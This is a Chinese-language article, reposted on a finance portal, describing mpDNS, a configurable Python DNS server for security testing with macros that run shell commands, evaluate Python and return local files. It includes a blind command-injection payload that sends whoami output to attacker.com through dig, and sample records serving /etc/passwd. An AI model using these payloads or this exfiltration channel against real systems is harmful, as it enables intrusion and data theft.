首页 | 财经 | 资源 | 理财 | 考研 | 职场 | 论文 | 资格 | 股票学院 |

股票学院: 股票入门 - 股票知识 - 股票术语 - 炒股技巧 - 选股技巧 - 跟庄技巧 - 炒股经验 - 投资策略 - K线图 - 均线 - 分时图 - 成交量 - 波浪理论 - 基本面分析 - 心理分析 - 涨停研究 - 趋势线 - 江恩理论 - MACD - KDJ - 技术指标 - 财经股票书籍在线阅读 - 金融类书籍下载 - 银行学院 - 保险学院 - 外汇学院 - 债券学院 - 股票学院 - 基金学院 - 港股学院 - 黄金学院

当前位置:蓝筹金融网 > 金融云 > 文章正文

mpDNS:Python实现的多功能DNS服务器

时间:2019-03-20 12:51:56来源:Freebuf作者:佚名

简单、可配置的“ clone和run ”DNS服务器,具有多种有用的功能。

适用于Python 2和3

names.db – >包含所有自定义记录(参见示例)

简单的通配符,如* .example.com

捕获unicode dns请求

自定义动作又称宏:

  1. - {{shellexec::dig google.com +short}} – >执行shell命令并使用result响应 
  2.  
  3. - {{eval::res = '1.1.1.%d' % random.randint(0,256)}}- >评估你的python代码 
  4.  
  5. - {{file::/etc/passwd}} – >回复本地文件内容 
  6.  
  7. - {{resolve}} – >将DNS请求转发到本地系统DNS 
  8.  
  9. - {{resolve::example.com}} – >解析example.com而不是原始记录 
  10.  
  11. - {{echo}} – >回复对等地址 
  12.  
  13. - {{shellexec::echo %PEER% %QUERY%}} – >使用变量 

mpDNS:Python实现的多功能DNS服务器

支持的查询类型:A,CNAME,TXT

更新names.db记录而不重启/重新加载./mpdns.py -e

重度基于https://github.com/circuits/circuits/blob/master/examples/dnsserver.py

用法: ./mpdns.py

编辑names.db,./mpdns.py -e无需重启

进攻和防守目的:

1.您需要一个轻量级的简单DNS服务器解决方案用于测试目的(不生产!)

2.测试Web应用程序中的各种盲注漏洞(例如/ping.php?ip=$(dig $(whoami).attacker.com))

3.在一个TXT查询中轻松渗透65K数据

4.DNS重新绑定

5.对特定查询执行自定义宏操作(在恶意软件分析实验室环境中很有用)

6.还有更多。它是高度可定制的。

安装

git clone https://github.com/nopernik/mpDNS

限制

1.由于UDP数据报限制为65535字节,DNS响应限制在约65200字节, 此限制适用于TXT分成256字节块的记录,直到响应达到最大允许值65200b, 因此TXT宏记录{{file:localfile.txt}}限制为65200字节。

2.不支持嵌套通配符 test.*.example.com

3.{{resolve::example.com}}宏中不支持自定义DNS服务器解析程序

4.TTL始终设为0

例子

names.db示例:

  1. # Empty configuration will result in empty but valid responses 
  2. # Unicode domain names are not supported but still can be catched by the server. 
  3. # for example мама-сервер-unicode.google.com will be catched but with SERVFAIL response 
  4. passwd.example.com    TXT     {{file::/etc/passwd}}  #comments are ignored 
  5. shellexec            TXT     {{shellexec::whoami}} 
  6. eval                TXT     {{eval::import random; res = random.randint(1,500)}} 
  7. resolve1            A       {{resolve}} 
  8. resolve2            A       {{resolve::self}}      #same as previous 
  9. resolve3            A       {{resolve::example.com}} 
  10. blabla.com            A       5.5.5.5 
  11. *                    A       127.0.0.1 
  12. *.example.com        A        7.7.7.7 
  13. c1.example.com        CNAME    c2.example.com 
  14. c2.example.com        CNAME    c3.example.com 
  15. c3.example.com        CNAME    google.example.com 
  16. google.example.com    CNAME    google.com 
  17. test.example.com    A        8.8.8.8 
  18. google.com            A        {{resolve::self}} 
  19. notgoogle.com        A        {{resolve::google.com}} 

使用names.db示例输出示例:

相关阅读

焦点图文

关于我们 | 广告服务 | 商务合作 | 网站地图

版权所有 Copyright(C)2018-2020 苏州骐云跃网络科技有限公司,未经授权禁止复制或建立镜像,否则将依法追究法律责任!
声明:我们不做任何形式的代客理财及投资指导,凡是以蓝筹金融网名义做股票推荐的行为均属违法!
广告商的言论与行为均与蓝筹金融网无关!股市有风险,投资需谨慎。
苏公网安备 32050502000166号
苏ICP备14018528号
商务合作:联系我们

蓝筹金融网版权所有